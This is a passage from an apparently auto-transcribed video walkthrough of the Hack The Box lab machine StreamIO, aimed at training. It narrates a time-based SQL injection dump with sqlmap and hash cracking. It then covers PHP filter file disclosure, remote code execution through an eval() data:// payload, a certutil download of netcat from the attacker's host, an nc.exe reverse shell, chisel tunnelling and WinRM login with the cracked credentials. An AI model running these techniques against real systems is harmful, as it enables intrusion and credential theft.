of this machine is medium. So if you did not subscribe the channel up to now, please subscribe the channel and hit the bell icon so that you can get the notifications on time. So without wasting time, let's go and we are going to solve this machine, and we will start it with the Nmap. So I already ran the scan to save the time, but I just want to show you the syntax one time. So Nmap space hyphen S capital V for version enumeration space hyphen S capital C for default scripts. And I also tried the aggressive scan with the timing template intensity 4, and the IP of the target is 10.10.1.158, and I saved this scan result in a file named as agger means aggressive.nmap. So I already ran it, so I just show you the scan results. So as you can see here, a bunch of ports open. So first port is port number 53, state is open, default for DNS, and it's using simple DNS plus. Port number 80 is open. It is default for HTTP, and the service running is Microsoft IIS HTTPD 10.0. And this information is always valuable, because with this version you can actually understand which kind of Windows operating system is running, or if it is the client operating system, so it could be Windows 10, or on which operating system of Windows IIS 10.0 is available. So you have an idea. If there is Windows Server, so on which Windows Server you may have Windows Microsoft IIS 10.0. So here if you go to see the title, so you can see it's running default IIS web server. So I already open up it here, and I created a record in etc host file with the domain name StreamIO.htb, so I can now access this website with the name. So this is the default page for IIS server. Now go further. There is port number 88 is open, and this is default port for Kerberos. Port number 135, port number 455, these ports are open. So this is for SMB shares, 139 NetBIOS, 389 for LDAP. This is interesting too. You can also enumerate the LDAP. Fine. Here you have the domain name, so you can create a record in etc host file. Now the interesting port here, again port 443, this is TCP port open, and this is for SSL or HTTPS. Here you can see it's using Microsoft HTTP API, HTTPD 2.0. Fine. And if you go to see the SSL information here, so you will find one more subdomain, which is watch.streamio.htb. I also created this record in my etc host file, so I can also open that. But before it, I just open streamio.htb with HTTPS on the port 443, and there is one website for the movies. Okay, and if I go https:// watch.streamio.htb, hit enter, and there is another application running on it. Fine, on this subdomain. So this is another part. Further, there are other ports like Microsoft DS, this one for Samba shares, and here kpassword 5, LDAP, TCP wrapped, TCP wrapped. Fine. So that's it. The most important information again here, if you see this line, you will find that the host name is DC. DC means it could be a domain controller, and the operating system running on it is Windows. So next important information is SMB2 security mode, and it's using 3.1.1. message signing is enabled, which is required here. So this is the thing. Now I'm going back, and let's see what we have here. So the first thing, we have HTTP, and here we have the default port, default IIS application or website is published. This is HTTPS, and this application seems pretty interesting. Now, once you scroll down, you will find here a valid user or valid email. So again, I'm going here. We already have Nmap scan file saved, so we don't need it here, but Oliver at StreamIO.htb. Fine. Okay. There are a bunch of links. So if we click on StreamIO, you can see we have here index.php, and this is more interesting. Why? Because mostly Windows IIS server is used for ASPX or .NET applications. It's also used for PHP applications, but the thing is, you find here an interesting information by clicking on this link, because now you can see there is index.php. That means PHP running over it. Now the thing here is you have Microsoft IIS and you have PHP on it, right? Okay, so we come back here and there is login page. If we click on login, we have here the login page, login.php. So these all the things is good. We will analyze all those further, but it's always good to run some enumeration in the background, and here I am going to enumerate the directories and files. So, and I'm going to do that with the GoBuster. So GoBuster directory space -z -w user share word list and checklist discovery web content, and I'm going to use raft small file, okay, files and lowercase. Now we need to specify the URL, so https://streamio.htb. Fine, space -k, because it's HTTPS site, so I don't want SSL warnings and SSL errors. For this, to ignore that, I use space -k, and number of threads I'm going to use 40. Fine, and just hit enter. Okay, now these are the files. Fine. Again, I'm going to enumerate directories also with the same approach. So GoBuster directory space -z space -w user share word list checklist discovery web content and raft directories, raft small directories and lowercase directories space -u https://streamio.htb/ and then again I'm going to use here space -k, and number of threads I'm going to use 40, and just hit enter. So this is done, and I'm going to keep all these information with me. You can take the screenshots also. So just copy that, come back here, and file enumeration. In the file enumeration, we found these files, and these all the files I found with this URL. So http://streamio.htb. Fine. Again, for directory enumeration, let's see what we will get. So directory enumeration on the same URL we did. So streamio.htb. You can use other tools like dirbuster, a dir search. So you can see here we have all these directories, maybe more, but what is important, we already have it. So this admin is important. See, once I record this video, okay, before recording this video I already solved that machine, and a lot of time consuming task I already skip here. But once I did that machine, I tried too many things. Like I also tried the directory enumeration and the file enumeration on this HTTP. Okay, I also did that here with this subdomain. I also try to enumerate the subdomains with FUF or with GoBuster, but I do not show that here. I skip that portion because there is nothing interesting I found before. So here most of the times I just show you the interesting part and the part from where I get the valuable information, and I skip other part which did not have any interesting or valuable information to solve that machine. So you must work on your methodology and keep enumerating, and remember enumeration is the key, because as much information you have, as more surface you have to find out the vulnerabilities and exploit it. So that's been said, we have here whatever we need. Go back. Now the interesting thing I want to show you once, if I say /admin and just hit enter, so you can see there is forbidden. But if I say, let's say images and hit enter, there is another type of error. So error is forbidden, but this error is coming from the server. This also, there is a difference in the errors. If I say admin, you can see this is forbidden. So that means we must log in here. So I tried bunch of things, like some default credentials. I also tried other credentials, some random credentials, try to brute force also, but nothing worked. But the thing what we write here before, like it's using Microsoft IIS server with PHP, and because it's using Microsoft IIS and this server built on Windows platform, so maybe there is MS SQL database running on the backend. So I actually tried bunch of things and something worked. So if I say admin and let's say password password, that's not gonna work, right? So I'm gonna send this request to the burp suite. I already opened up the burp suite. Just manage a bit. Okay, turn on the burp proxy on my browser and just send the request. Come to the HTTP history here, and we have the post request. Now if we see that post request, we can send this request to the repeater, go to the repeater and just send this request again. And as you can see 200 okay, but still we have login field. So if I say here login field, so login field, right? Now what I try some default payloads for SQL injection. For me this one worked for MS SQL. So wait for space delay, and how much delay, 0:0:, let's say 5 seconds, right? You can also see one thing, once we click send before, the request took only 134 milliseconds, but now we are going to try 5 seconds delay, right? So and add this. Let's try this one. No. Send it now, and this time it's now taking 5 seconds. So we have the delay in response 5 seconds. So 5000 milliseconds mean 5 seconds. We can again confirm it by adding more delay, let's say 10 seconds, and it is going to take 10 seconds to respond. So that means there is SQL injection, and now for this I'm going to send this request with the SQLMAP. So open new tab here and SQLMAP space -u for the URL, and let's say https://login.php. Fine. The method here is post method, because remember the request is using post method. Fine. The next thing is data. So -- data, and data is going to be, let's say, username and password. So copy this and paste it here. The next thing I want to first see current DB. Fine. And that's it. You can also go for current user. Fine. Space --batch. Here we choose batch. This batch actually automate all the process. Otherwise SQLMAP is going to ask us too many questions. You want to do this, you want to do that. So batch automatically choose the best options. Time delayed vulnerability. So it is going to take so much time if you are going to enumerate or inject SQLi, because I already ran these queries before, so that's why it did not take too much time and it did not try too many payloads on this request. Fine. So as you can see here, the backend database is Microsoft SQL Server, and PHP it's using is 7.2.26, and it's using Microsoft IIS 10. Also you can confirm these. You can confirm this with whatweb and https://streamio.htb. So you can see here bootstrap cookie, PHP session ID, and the email. We have a valid email here, and Microsoft version is there, jQuery version is there, IIS version, PHP version, everything is there. Okay, so go back here, and as you can see, the database it's using is StreamIO. So this is the database name. I'm going to keep it with me. Paste that. This is the database name. Now we need to enumerate this database more. So I'm going to clear again and just going to add few things here, because now we know the database name. Space -d and StreamIO. Hit enter, but we need to enumerate the tables. Let's see how many tables are there. No, this is wrong. To enumerate the table, here we need to specify like this, tables, and hit enter. So this will enumerate the tables again, because I already ran these queries before, that's why it is not taking too much time. But once you run this query, it will take some time, because the vulnerability here, SQL injection, this is on time delays. So every request it is going to take 5 seconds, and again it is going to enumerate one by one all these characters. So it has a character list, ASCII list from 1 to 0, then all the special characters, then lowercase alphabets, then uppercase alphabets, and it is going to match each alphabet from the database or from the queries. So it will take time. Now we have two tables, movies and users, and this is interesting. Up to here there is no problem. It will not take much time. It will take maybe 20 minutes or 15 minutes, but the pain starts from here. Once you know there is a table users. So this time we also know the table name. So I'm going to say space -t and let's say users. Hit enter. Okay, we tell it okay, but we don't tell it what I want to enumerate from this table. Come on. Columns, right? Now let's see how many columns are there in the users table. Columns and hit enter. Now this query will tell you how many columns are there and what is the data type of the column. So the first column is ID, its data type is integer. There are total 4 columns. Okay, so here it is. Second column is this, which is a bit messed up. Maybe once you enumerate, it will not messed up and it will give you, instead of that, it will give you is underscore staff. This is the second column. The third column is password and its data type is nchar. Fourth column is user and its data type is nchar. So I'm going to take this, copy and put it with me. Now the column here which is messed up is actually staff. Save it and come back here to do some other enumeration. Now we know there are 4 columns in the users table. Now we need to dump the information, and there you will be in the pain because it is going to take ages. What I did once I did that machine, I write the query here, I write the syntax and put it with the dump, and then I sleep. Next morning when I woke up, I got the database dumped, all the tables and columns dumped. So you can also do like that. Now we have everything. Let's go and we are going to dump few things. So table users hyphen dump. You can write like this, and few more things I want to tell you. First let's run this. The thing is, here you can see 32 entries returned, right? 32 columns returned, but it's also advising you to use force pivoting. The thing is here, user is this. Let's say I just want to enumerate the column, and the column name is underscore staff, and I'm going to say space hyphen dump, right? And just hit enter. So I want to see ID is the unique ID for each user, but what is staff? So once I enumerate is staff, you can see there are 32 entries again, and among these 32 entries, few staff's value is 1 and few staff's value is true. That means there are maybe 29 users, those are in the staff, and 3 users, those are not in the staff. So maybe the users in the staff have some other higher privileges than the staff, than the members, those are not in the staff members. So now my purpose is to enumerate, and keep in mind that we have 32 entries every time. So now what I want to do here is I want to enumerate columns like username, comma, password, right? Because we already have these entries. We saw before that these columns are there. Where is underscore staff is equal to 1. I want to see all the staff members, those have staff ID 1, and I want to see only these 2. I am avoiding ID here because more columns you exfiltrate, more time it will take. Okay, and here I'm going to use hyphen pivot column, and again I'm going to use hyphen force hyphen pivot. Fine. So force pivoting. So that's what the SQLMAP suggested us, and we want to pivot the column. And here actually I messed up something, which is you should use this where clause with two dashes, right? Now the thing is, once you dump all those users, those have staff ID 1, you will find approximately 29 users, and among those 29 users there is one user which has the ID 31, and then I'm going to use hyphen pivot hyphen column, and I also want to use force pivoting. Now I want to dump only the user who has ID 31. This user is again in the staff ID 1, right? And again here with the pivot column, we need to define the column which we want to pivot. So I want to pivot the column ID. Okay, now hit enter. And as you can see, we have one entry, one user who has this ID, and this is the hash for that user, means this is the password, and this is his username. So if we go here, let's say crack station. So if we put this hash, because this is MD5 hash, so if we put this hash here in the crack station and crack the hash, you will find the password, and this is the password. Fine. So I'm going to copy this password, come back here, and I'm going to say username is Yoshihide and the password is this. Fine. Save that. Now when I did that machine, I also go for curve roasting to enumerate the users, but that give me bunch of users, but this Yoshihide user is not in the word list, so it did not give me this Yoshihide user. Otherwise that give me Martin user and other user too. So here I'm going to close this, and I leave this on you to explore more these all the queries and dump other databases too, not only StreamIO, because we just get the current database and it gave us StreamIO is the current database, and we enumerate that database for the tables and for the columns, and then we dump other information. Yoshihide, and the password is this. Copy, come back here, paste the password, hit login, and we are logged in to the application. Right now we saw before from the directory enumeration part that we have one admin directory, right? So if we try /admin and hit enter, so we have admin panel, and there are a bunch of management links. So there is user management. So if we click on user management, you can see there is a parameter named as user, and there are list of users which you can delete. So I'm not going to delete this admin user. You can register another user and you can delete it. Similarly, there is a staff management. So all these users in the staff. Now from here you can see the bigger picture of the database dump, what we did with SQLMAP. So staff management. So these all the users in the staff which have staff ID 1, which is you can see Yoshihide is also a member of staff, right? And it has parameter staff. Next, go to the movies, and it has parameter movies, and all those movies are here. And whatever movie you want to delete, you can delete it from here. Leave a message for the admin. So if you click on it, you will get another parameter, which is message, right? So I'm going to right click and view the page source. Maybe we have other parameters too, which is hidden or not mentioned here, but in the page source we can see, or commented links are there. So there is no commented link here, but I am curious to just fuzz these parameters, maybe other parameters too. And before this, I already tried for the LFI on these all the parameters, but we did not find any local file inclusion on these parameters. So let's go and just fuzz the parameter. So I'm going to clear it. To fuzz the parameters, I'm going to use ffuf space -w for the word list, and I'm going to use user share word list seclist, discovery, web content, and burp parameters names dot text space -u, which is going to be https://StreamIO .htb/admin, because all those parameters you see here is inside the admin directory. So admin / and then question mark, and I want to fuzz the parameter which is here, and its value, let's say index.php. Fine. Number of threads I want to use, let's say 60. Go back to the burp proxy and open this request. So this is get request, but most important part here is this session ID, because if we do not use this session ID, then the server consider us unauthenticated user, and it will say, okay, you are unauthenticated and you are trying to access this resource, so you, without authentication, you are not authorized to access this resource. So what we need to do here is we need to copy this PHP session ID and come here, space -b, actually before this, space -b, and put the session ID here, right? So space -b switch is for cookies. Okay, and everything seems okay. Just hit the enter button. Messed up something. What we messed up, we need to figure out here. So we use the word list, then we specify, okay, we messed up here. We just put HTTP and it is HTTPS. So HTTPS, StreamIO, we don't need threads. Maybe that messed up, but it should not. HTTPS, StreamIO, HTTP. Now everything seems perfect, and this is the PHP session ID, and just hit enter. So as we hit enter, everything is 200, but let's filter the size here. So 1678. Clear that. Come here and space -filter size 1678, and just hit enter. So as we hit enter, we got debug, and this is new. This is new parameter, because we have what we have here. Close this, /admin, hit enter and go to the page source. So here you can see we have users, we have staff, we have movies, and we have message, but we do not have debug. So this is the new parameter. So I'm going to take copy of it and paste it with me. Debug is equal to index.php. Hit enter, and there is error. That means it's trying, but let's try PHP filter. So PHP : /filter /convert base64 -encode and resource is equal to index.php. Come on, yeah, hit enter. Debug php filter convert.base64 -encode and resourc resource. Here, hit enter, and now we have this value from here to here. Now copy this and send this value to the decoder. Paste it here, paste that, and smart decode not working, so decode as base64. Now we have the index.php file content, so everything is here. Now if we see that closely, first of all I'm going to copy this, come here, open new page and paste it here. So first thing first, PHP include true, session must be admin, and we have some database credential here. So this credential is important. I'm going to copy this and paste it here. Index.php, paste that, save it. Now we have these credentials, but we cannot access it from our machine because the database port is not published over publicly, did not publish publicly. So we will use it later. But the thing is, now we already fuzz the parameters. Now let's try to fuzz the files. Maybe there is some interesting file there which we do not have. So let's do this. Clear, nothing change, just what we need here is, instead of fuzz, debug, and here we need to put fuzz because this time we are going to fuzz the file. And also here, instead of this word list, I'm going to use raft small, and let's say file word list of lower cases, and just again here, instead of 1687, okay, hit enter. As we hit enter, everything is 200, but we will filter it from the size 1712. So clear, come back, space -fs 1712, hit enter. We have index.php, perfect. Okay, so we have two files, index.php and master.php. So let's see what's inside master.php. And here you just need to change this to master.php, hit enter, and we have all of these base64 encoded payload. So just copy that and come to the decoder again, Control A, delete that, paste the new one, and that's there. So I'm going to Control A to copy, come back here, mousepad, open new mousepad and paste that. Now if you see this file closely, scroll down all the way, everything is okay there. There are some bunch of queries, and how the queries working, like here, bunch of queries it run. But if you go down in the bottom, you will see there is another post form. So the method it's using in this form is post method, and it is going to there is a field which is hidden and its name is include. Here, this is the most important part. You can see eval is there. So PHP eval function is very dangerous function, and with this you can actually execute the system command. So let's see how we will weaponize that. Come here, I just want to create I'm gonna put this, take this from here up to here, copy, and let's say master.php. This is the vulnerable part, and I'm going to create a request. Let's say curl space -X for method. So the method I'm going to use is post. To avoid the SSL warning, I'm going to use space hyphen small k x. The method I'm going to use is post, because here it's using post request, right? Now header, inside header we need to specify the content type, and the content type is going to be, let's say, applications slash x hyphen www hyphen form hyphen URL encode, right? Content type, then you need to specify the cookie, because we are logged in, and after login an authenticated user only can access this resource. So come back here, and PHP session ID, I'm going to take it from here, copy, come back here, paste that, and after that hyphen hyphen data hyphen binary, because we need to send data in the binary format, and let's say include is equal to data colon slash slash, and what data we are going to send is going to be text slash plain data or base 64, because we see that it's using PHP filter, so base 64 encoded. And then the data we are going to send system $_get cmd, and like this. So this is going to be the data. So copy that, come here, paste that, and after data we need to specify the URL. So URL is going to be https://streamio.htb/admin slash debug is equal to master.php, and inside master.php we created one more parameter, which is cmd. So cmd, and its value is going to be any command, okay, because eval function is already there. So because eval function is already there, so it will execute this command as the system command, right? So that's it. This is our curl command to actually exploit this eval function. So copy that, go back to the terminal, come here, clear this and paste that, hit enter, and it's saying operand expected at this cmd. So now instead of sending plain text, let's just copy that value, come here, use cyberchef, hit enter to encode it as base 64. Okay, to base 64 and paste that value. So this is the base 64 value. Copy that and come back here to the command, and instead of this, let's put the base 64 value. Save it and just copy this command, come back to the terminal, and this time hopefully that will work. Hit enter. So first of all, because we call here master.php in the debug parameter value, come on, it's too large. Here in the URL we are going to call debug parameter, and inside debug parameter we are calling master.php, and then we provide cmd, the command is equal to dir, because the target system is Windows, that's why we are using Windows command. So here we did not find the result of the command. Okay, we should get the command in result of the command in this section. So let's see what we need more here. It should be URL encode. Now copy that again, come here, clear this and paste that, hit enter. And again, we did not find the result of our command. It should be URL encoded. Save that, take it again, copy, come back here, clear, paste that again, and hopefully we get something. And yeah, this time we get the directory command output. But the problem here is every time once you run the command, you have to see all this thing. So to filter that, we can do few more things. If we say grep space -h, grep space -help, hit enter. So here context control. So we will use space -a, means after context number. That means print this number lines of trailing context. So let's say if we pipe the output of this with grep space -A, let's say 5000. I want to see the output from here, so just copy that and come here, paste that, save it, and let's go run this command one more time. Copy, come back here, clear, and paste that, hit enter. And yeah, this time we have a bit good output. So now it is okay for us. So that means we are executing the commands on the target machine. That is very, very good. Now we just need to do few more things to get the reverse shell. So for that we can do, there are many ways. You can even upload the netcat on the target, and then in the next command you can execute that from the target to get the reverse shell connection. You can upload the Nishank shell with the PowerShell command. Okay, and you can also upload the PowerShell reverse shell one-liner, right, in the base64 format. But here what we are going to do is we are going to do some simple thing to make everything simple. Quit, we don't need that, clear this. Now here clear all of these. So plus cd/opt, inside opt directory we have a netcat. So I'm going to say python3 space -m http.server on port number 80, and come back here. First of all, we need to make another command, paste that, and in this command the parameter value, instead of dir, we are going to say certutil.exe, and instead of space we are going to use plus space -url cache and then space. So for space plus -f, okay, and space -split, and then space http://10.10.14. what is my IP, ifconfig tunnel 0, and my IP is 14.55. so 14.55, right? And now we need to /nc64.exe. this is the netcat file, and we need to copy this in C Windows in the temp directory, because temp directory normally users have permissions on the temp directory. So that's it. Let's try to run this. Copy and paste that. So if we get the hit here on my published HTTP server, that means it's downloading there, and yeah, we got hit. That means the command for the cert util executed and the shell is successfully uploaded. Now what we can do here is we can check whether everything is okay and we have the netcat on the target or not. So we can execute command here like dir. So dir plus inside C Windows temp, save it and just execute this command. Copy, paste that. So cmd is equal to dir C Windows temp, hit enter, and is there anything? C Windows temp, we don't have netcat here. We messed up something. We can do one thing, maybe it's escaping this, so put 2 slashes, we get the hit here, and now let's try to see whether we have here netcat or not. Okay, we can try to upload it as nc.exe and hit enter. We got hit here. So what I just change here, that I'm saying download this file from this URL and paste it in this location, put it in this location, C Windows temp, and inside temp with the name nc.exe. Try to check it, dir C Windows temp, and yeah, this time we have netcat.exe. Now we just need to execute this and get the connection in our machine, get the reverse shell in our machine. So from here, just take that, copy, paste, and now here, so Windows temp, and here nc.exe, plus means space -e, then plus means space 10.10.14.55, this is my IP, then plus means space 9090 plus, let's say cmd.exe. That means we are going to execute this command from the target, right? Everything seems okay. Just come here on the terminal and start the netcat connection. So nc space hyphen nlvp and 9090. Fine, clear that, and we don't need now this Python server. Hit enter, copy and paste that, hit enter. Okay, we didn't get the connection. Let's try one more time. Let's say we don't need this now because we are not going to see any output here, and instead of put cmd.exe here, let's put after e cmd.exe and put one more space. Hit enter, and yeah, this time we get it. So this is the final payload. Okay, who am I? I am Yoshi Hyde. That's good. Now just enumerate a bit net users, for how many users are there: administrator, guest, JD God, Nick 37, Martin, and Yoshi hide. Who am I / priv? What are the privileges I have? So I have these privileges. Okay, and in what group we are? So let's say net user Yoshi hide. Hit enter. So this is my detail as Yoshi hide user. So the most important part here, these two. You can see local group membership is nothing, but global group membership means the domain group member. So this Yoshi hide user is in the domain user group or a member of domain user group. That means it is low privileged user, and we do not have any special privileges. Let's try one more thing. Let's say net group or groups. So it is showing us the groups on the domain controller. So there are clonable domain controllers, core, staff, and admins are there, domain controllers, and all these enterprise read only. So these groups are there from the domain controller. Okay. What else? Let's see. Net user Martin was there. So if you see Martin, so Martin is local administrator of this machine. For the domain controller or for the Active Directory, it is normal user. But for this machine on which we are exist here, for this machine, he is the member of administrator. Next, see, let's say net user, other user was Nick37. Hit enter. So again, he is the domain user, means the normal user. Net user JD God. Hit enter. Fine, we will see rest of the things later, but first of all, sorry, CLS. Okay, CLS will not work here. Okay, now the thing is, first of all, we will see net state space -ano to see. Oh, come on, I should have choose other switches. Go up, here. So now you can see here we have this MS SQL, Microsoft SQL port, which is listening. Okay, 1433. And we have other databases too, as I mentioned before. In the SQLMAP command, where I just dump the current database, you can dump other database too in the initial state, and you will find other databases. So Control C and clear this again, clear that and execute this. Okay. So 1433 we got, but 1433 we cannot access remotely. So for that, what we need to do here is we can upload the chisel here, and we can make the port forwarding, and with the port forwarding we can access the database locally from the attacking machine, right? So let's go, and first of all we need to upload the chisel. I already have it in my op directory. I'm going to start the Python HTTP server here and come back here, cd / users / Yoshi hide / downloads, and what was that? C users Yoshi hide cd / users dir. We don't have Yoshi hide here, so let's go to Windows, cd / windows / temp. Okay, here let's say certutil.exe space hyphen URL f space hyphen split http://myip, and then no, chisel is not here. Clear cd chisel underscore all. Yeah, there is chisel. So we need to upload here the Windows version, means exe file, and 64-bit, this one. So let's just start the Python server from this directory, and now come here, chisel x64.exe, and hit enter. And chisel is there. Okay, so now let's just start the server here cd/opt chisel all, because we have this chisel for Linux here. So clear chisel, and this is my attacking box is going to be the server, and space hyphen reverse space hyphen port, and the port I'm going to use, let's say 4545. Fine, that's it. And here on the target machine we need to execute chisel x64.exe, and it's going to be client, then the attacker IP, which is this, and let's say 4545 because we are listening on 4545, then capital R for reversing, and the port is 1433 localhost, and access on 1433. Hit enter. We should get a hit, and as you can see the connection is established. Now from my machine I can access the MS SQL database as a local machine, and for that I'm going to use the impacket module of MS SQL client. So impacket MS SQL client, yeah, this one, vertical impacket MS SQL client space hyphen h. Come on, man. Fine. So these all the switches there we can use. So the first thing is space hyphen db. So hyphen db. So the database name is StreamIO. We already know this. Then we need the credentials. So the credential is going to be like this. Fine. Okay. And the credentials we have here, we already noted that. So dbadmin is the username and this is the password. Copy, go back, db_admin : this is the password, then @ and 127.0.0.1, and the port I'm going to use space hyphen port. We need to write completely or just P. Let's try. The port is 1433. Hit enter, hope for the best, and we are logged in. So let's see all the databases. Select name from sys.databases. Hit enter. So all these databases are there. Fine. Master, tempdb, model, msdb, StreamIO, and StreamIO.backup. And this StreamIO.backup seems interesting because it is maybe the last version of this backup, and it may have other information which this database does not have. Also, in the initial phase of SQLMAP, you will find all these databases, right? So just enumerate the databases and dump the database, you will find all these 4-5 databases. Okay, so my interest is stream databases because I already see this StreamIO database, right? So let's say, first of all, select db_name to see in which database I am. I am in the StreamIO. Select star information dot underscore schema schema dot tables tables and hit enter. So it has users table and movie table. So just select star from users, hit enter, and as you can see, all these users are there. We already got Yoshi Hide, and as you remember, if you remember, Yoshi Hide has ID 3. So once you dump that database in the initial phase, you will find all those users. And as you can see, Yoshi Hide has staff ID 1. Admin has staff ID 0. So like that. Fine. But our focus is something else. So we need to go to use StreamIO underscore backup database. DB name, and now as you can see, we are inside the StreamIO underscore backup database. Now we need to see how many tables are there. So there are same, like there are movies table and users table. Let's try to dump its users table. So select star from users, and you can see there is a huge difference between this database users table and StreamIO underscore backup database users table. So what I need is, I can take this, copy, come back here and just paste that. So we need to filter a bit. Okay, and let's just go to the crack station and we can put each of these hashes one by one, and let's see if we got any credential. So go back, back here, we don't need that. Crack station, come here. So for Nick, just copy this one, go back to the crack station and paste that hash. Oh, chimneys, come on. Crack the hash, and we got the password. So copy that, come back here, and it has the password like this. Fine. Similarly, we already have the Yoshi Hide password. We don't need that. And the rest of the users, you can also try to crack the password. But for me, Nick37 is most important. Why? Because in the initial here in the shell, once we get the shell, reverse shell, and we go to the net users, we find there are 5 users like Nick37. We got JD God. There was administrator 2, and there was Yoshi Hide, right? And there was Martin also. Fine. So we see all those users were there on the system. So if we see this list of users and its hashes, we have only 2 users which match this list which we got on the system. So Nick37, Yoshi Hide we already have, Nick37 was important. So we got the password now for Nick37. So let's go and Nick37, and the password we have is this. Okay, so I don't want it now. Just exit from here, clear, and let's go. A will WinRM space -i for the IP address, or you can specify the interface. The IP address of the target machine is this, space -u for the username, which is nick37, and space -p for the password, and we put the password here like that. Copy and just paste that password, hit enter, and hopefully we get login. And yeah, we logged in as Nick. So I want to show you net users. So we have Nick there, got Martin, so that's why I go for the Nick. Let's go cd /desktop and dir. So we have user flag here. We can type user.text to read the flag.